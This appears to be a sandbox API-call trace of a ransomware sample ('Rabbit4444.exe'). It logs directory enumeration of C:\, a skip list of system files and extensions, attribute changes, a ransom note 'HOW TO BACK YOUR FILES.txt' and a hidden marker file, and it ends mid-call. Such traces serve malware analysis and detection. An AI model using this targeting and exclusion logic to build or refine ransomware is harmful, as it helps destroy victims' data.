[0043.002] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0043.002] lstrlenW (lpString=".lnk") returned 4 [0043.002] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0043.002] lstrlenW (lpString=".ini") returned 4 [0043.002] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0043.002] lstrlenW (lpString=".sys") returned 4 [0043.002] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0043.002] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0043.002] lstrcmpiW (lpString1="Logs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.002] lstrcmpiW (lpString1="Logs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.002] lstrcmpiW (lpString1="Logs", lpString2="Rabbit4444.exe") returned -1 [0043.002] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0043.002] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0043.003] lstrcmpiW (lpString1="Logs", lpString2="windows") returned -1 [0043.003] lstrcmpiW (lpString1="Logs", lpString2="bootmgr") returned 1 [0043.003] lstrcmpiW (lpString1="Logs", lpString2="pagefile.sys") returned -1 [0043.003] lstrcmpiW (lpString1="Logs", lpString2="boot") returned 1 [0043.003] lstrcmpiW (lpString1="Logs", lpString2="ids.txt") returned 1 [0043.003] lstrcmpiW (lpString1="Logs", lpString2="NTUSER.DAT") returned -1 [0043.003] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Logs" | out: lpString1="Logs") returned="Logs" [0043.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf65c8 [0043.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x10) returned 0x103a70 [0043.003] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf65d0 | out: ListHead=0xf68b0, ListEntry=0xf65d0) returned 0xf6650 [0043.003] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2="Rabbit4444.exe") returned -1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2=".") returned 1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2="..") returned 1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2="windows") returned -1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2="bootmgr") returned 1 [0043.003] lstrcmpiW (lpString1="pagefile.sys", lpString2="pagefile.sys") returned 0 [0043.003] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="Rabbit4444.exe") returned -1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2=".") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="..") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="windows") returned -1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="bootmgr") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="pagefile.sys") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="boot") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="ids.txt") returned 1 [0043.003] lstrcmpiW (lpString1="PerfLogs", lpString2="NTUSER.DAT") returned 1 [0043.003] lstrcpyW (in: lpString1=0x130eb3e, lpString2="PerfLogs" | out: lpString1="PerfLogs") returned="PerfLogs" [0043.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6628 [0043.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x18) returned 0xf6468 [0043.004] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6630 | out: ListHead=0xf68b0, ListEntry=0xf6630) returned 0xf65d0 [0043.004] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xd11ee0ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xd11ee0ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="Rabbit4444.exe") returned -1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2=".") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="..") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="bootmgr") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="pagefile.sys") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="boot") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="ids.txt") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files", lpString2="NTUSER.DAT") returned 1 [0043.004] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0043.004] SetFileAttributesW (lpFileName="C:\\Program Files", dwFileAttributes=0x10) returned 1 [0043.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6328 [0043.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x22) returned 0x10c1e0 [0043.004] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6330 | out: ListHead=0xf68b0, ListEntry=0xf6330) returned 0xf6630 [0043.004] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7511354, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe7511354, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0043.004] lstrcmpiW (lpString1="Program Files (x86)", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.004] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Rabbit4444.exe") returned -1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="windows") returned -1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="bootmgr") returned 1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="pagefile.sys") returned 1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="boot") returned 1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ids.txt") returned 1 [0043.005] lstrcmpiW (lpString1="Program Files (x86)", lpString2="NTUSER.DAT") returned 1 [0043.005] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0043.005] SetFileAttributesW (lpFileName="C:\\Program Files (x86)", dwFileAttributes=0x10) returned 1 [0043.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf66a8 [0043.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2e) returned 0xf77d0 [0043.005] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf66b0 | out: ListHead=0xf68b0, ListEntry=0xf66b0) returned 0xf6330 [0043.005] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xdf6e53bc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xdf6e53bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="Rabbit4444.exe") returned -1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2=".") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="..") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="windows") returned -1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="bootmgr") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="pagefile.sys") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="boot") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="ids.txt") returned 1 [0043.005] lstrcmpiW (lpString1="ProgramData", lpString2="NTUSER.DAT") returned 1 [0043.005] lstrcpyW (in: lpString1=0x130eb3e, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0043.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf66c8 [0043.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x1e) returned 0xff4f0 [0043.006] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf66d0 | out: ListHead=0xf68b0, ListEntry=0xf66d0) returned 0xf66b0 [0043.006] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="Rabbit4444.exe") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="bootmgr") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="pagefile.sys") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="boot") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="ids.txt") returned 1 [0043.006] lstrcmpiW (lpString1="Recovery", lpString2="NTUSER.DAT") returned 1 [0043.006] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0043.006] SetFileAttributesW (lpFileName="C:\\Recovery", dwFileAttributes=0x2012) returned 1 [0043.007] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf66e8 [0043.007] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x18) returned 0xf6308 [0043.007] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf66f0 | out: ListHead=0xf68b0, ListEntry=0xf66f0) returned 0xf66d0 [0043.007] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="Rabbit4444.exe") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2=".") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="..") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="windows") returned -1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="bootmgr") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="pagefile.sys") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="boot") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="ids.txt") returned 1 [0043.007] lstrcmpiW (lpString1="swapfile.sys", lpString2="NTUSER.DAT") returned 1 [0043.007] lstrcpyW (in: lpString1=0x130eb3e, lpString2="swapfile.sys" | out: lpString1="swapfile.sys") returned="swapfile.sys" [0043.007] SetFileAttributesW (lpFileName="C:\\swapfile.sys", dwFileAttributes=0x22) returned 0 [0043.007] SetFileAttributesW (lpFileName="C:\\swapfile.sys", dwFileAttributes=0x6) returned 0 [0043.007] lstrlenW (lpString="swapfile.sys") returned 12 [0043.007] lstrlenW (lpString="Rabbit4444") returned 10 [0043.007] lstrcmpiW (lpString1="apfile.sys", lpString2="Rabbit4444") returned -1 [0043.007] lstrlenW (lpString=".dll") returned 4 [0043.007] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0043.008] lstrlenW (lpString=".lnk") returned 4 [0043.008] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0043.008] lstrlenW (lpString=".ini") returned 4 [0043.008] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0043.008] lstrlenW (lpString=".sys") returned 4 [0043.008] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0043.008] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="Rabbit4444.exe") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="bootmgr") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="pagefile.sys") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="boot") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="ids.txt") returned 1 [0043.008] lstrcmpiW (lpString1="System Volume Information", lpString2="NTUSER.DAT") returned 1 [0043.008] lstrcpyW (in: lpString1=0x130eb3e, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0043.008] SetFileAttributesW (lpFileName="C:\\System Volume Information", dwFileAttributes=0x12) returned 1 [0043.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64c8 [0043.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0xf2400 [0043.008] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64d0 | out: ListHead=0xf68b0, ListEntry=0xf64d0) returned 0xf66f0 [0043.008] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0043.008] lstrcmpiW (lpString1="Users", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.008] lstrcmpiW (lpString1="Users", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.008] lstrcmpiW (lpString1="Users", lpString2="Rabbit4444.exe") returned 1 [0043.008] lstrcmpiW (lpString1="Users", lpString2=".") returned 1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="..") returned 1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="windows") returned -1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="bootmgr") returned 1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="pagefile.sys") returned 1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="boot") returned 1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="ids.txt") returned 1 [0043.009] lstrcmpiW (lpString1="Users", lpString2="NTUSER.DAT") returned 1 [0043.009] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Users" | out: lpString1="Users") returned="Users" [0043.009] SetFileAttributesW (lpFileName="C:\\Users", dwFileAttributes=0x10) returned 1 [0043.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf65a8 [0043.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x12) returned 0xf64a8 [0043.009] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf65b0 | out: ListHead=0xf68b0, ListEntry=0xf65b0) returned 0xf64d0 [0043.009] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0043.009] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.009] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.009] lstrcmpiW (lpString1="Windows", lpString2="Rabbit4444.exe") returned 1 [0043.009] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0043.009] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0043.009] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0043.009] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="Rabbit4444.exe") returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2=".") returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="..") returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="windows") returned 1 [0043.009] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="bootmgr") returned 1 [0043.010] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="pagefile.sys") returned 1 [0043.010] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="boot") returned 1 [0043.010] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="ids.txt") returned 1 [0043.010] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="NTUSER.DAT") returned 1 [0043.010] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Windows10Upgrade" | out: lpString1="Windows10Upgrade") returned="Windows10Upgrade" [0043.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0043.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x28) returned 0x10c540 [0043.010] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf65b0 [0043.010] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0043.010] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0043.010] lstrcpyW (in: lpString1=0x130eb3e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0043.010] CreateFileW (lpFileName="C:\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x274 [0043.010] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0043.010] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0043.013] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0043.013] CloseHandle (hObject=0x278) returned 1 [0043.013] CloseHandle (hObject=0x274) returned 1 [0043.014] GetCurrentThreadId () returned 0xd98 [0043.014] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0043.014] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0043.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c540 | out: hHeap=0xe0000) returned 1 [0043.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0043.015] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade" | out: lpString1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0043.015] lstrcatW (in: lpString1="C:\\Windows10Upgrade", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\") returned="C:\\Windows10Upgrade\\" [0043.015] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3" [0043.015] CreateFileW (lpFileName="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0043.020] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0043.022] FlushFileBuffers (hFile=0x27c) returned 1 [0043.023] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0043.024] CloseHandle (hObject=0x27c) returned 1 [0043.024] lstrlenW (lpString="C:\\Windows10Upgrade") returned 19 [0043.024] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0043.024] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe2f5e3c5, 